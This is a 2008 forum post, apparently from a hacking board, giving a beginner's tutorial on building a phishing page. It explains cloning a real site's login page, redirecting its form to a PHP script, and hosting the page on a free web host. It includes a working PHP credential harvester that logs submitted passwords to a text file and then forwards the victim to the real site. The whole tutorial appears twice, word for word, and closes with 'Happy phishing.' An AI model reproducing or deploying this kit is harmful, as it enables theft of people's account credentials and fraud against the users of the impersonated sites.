03-10-2008, 04:44 PM
Hi all! heres my first tutorial and its gonna be on Phishing!
allright lets get started!
1. First things first you must choose the site which you wanna make a phisher from.
2. When you found your site right click on it and say "view source" and save it on desktop as index.htm
3. Open the "index.htm" with notepad and find search the source for the word "action=". you should find a command looking like this
<form action="RANDOM URL" method="post">
or anything alike and probably more inside like "id=" and "autocomplete=".
4. change the url (in this case "RANDOM URL") to "write.php"
5. Save index.htm
6. Time to create a free website. It MUST SUPPORT .php files so i suggest the use of http://www.700megs.com. Create a free website.
7. login to your website and go to "file manager"
8. delete the file thats already there called "index.htm" and upload your "index.htm" (the one you just made)
9. Create a new file called "write.php" and copy / paste this:
<?php
header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
10. Switch out the word "WEBSITE" with the site the browser should go to after victim wrote his/her password. so it should say like this:
header("Location: http://hotmail.com ");
you might want to change the textfile name so others wont be able to view the file.
11. Save this file (write.php), and upload it to the subdomain aswell
13. test out your website. type in something in your phisher and then go to filemanager and open the password file, what you wrote should be typed here!, you can also access the password file by going to http://www.yourdomain.700megs.com/passwordfile.txt
14. If it does not work, you can try to edit the form method from "post" to "get".
Happy phishing
allright lets get started!
1. First things first you must choose the site which you wanna make a phisher from.
2. When you found your site right click on it and say "view source" and save it on desktop as index.htm
3. Open the "index.htm" with notepad and find search the source for the word "action=". you should find a command looking like this
<form action="RANDOM URL" method="post">
or anything alike and probably more inside like "id=" and "autocomplete=".
4. change the url (in this case "RANDOM URL") to "write.php"
5. Save index.htm
6. Time to create a free website. It MUST SUPPORT .php files so i suggest the use of http://www.700megs.com. Create a free website.
7. login to your website and go to "file manager"
8. delete the file thats already there called "index.htm" and upload your "index.htm" (the one you just made)
9. Create a new file called "write.php" and copy / paste this:
<?php
header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
10. Switch out the word "WEBSITE" with the site the browser should go to after victim wrote his/her password. so it should say like this:
header("Location: http://hotmail.com ");
you might want to change the textfile name so others wont be able to view the file.
11. Save this file (write.php), and upload it to the subdomain aswell
13. test out your website. type in something in your phisher and then go to filemanager and open the password file, what you wrote should be typed here!, you can also access the password file by going to http://www.yourdomain.700megs.com/passwordfile.txt
14. If it does not work, you can try to edit the form method from "post" to "get".
Happy phishing